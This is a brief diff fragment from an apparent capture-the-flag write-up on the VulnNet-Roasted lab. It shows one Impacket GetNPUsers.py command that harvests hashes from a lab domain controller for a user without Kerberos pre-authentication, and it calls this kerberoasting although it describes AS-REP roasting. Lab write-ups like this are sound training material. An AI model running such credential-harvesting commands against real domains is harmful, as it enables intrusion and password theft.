r3vSh3ll/write-ups/VulnNet-Roasted.md

 j-leet
 ```
 ##
-kerberoasting with the username file returns a hash for t-skid
+Try kerberoasting with the username file returns a hash for t-skid (Implies user t-skid does not require kerberos pre-authentication)

 ```python
 python3 GetNPUsers.py -dc-ip 10.10.176.144 -usersfile users.txt vulnnet-rst.local/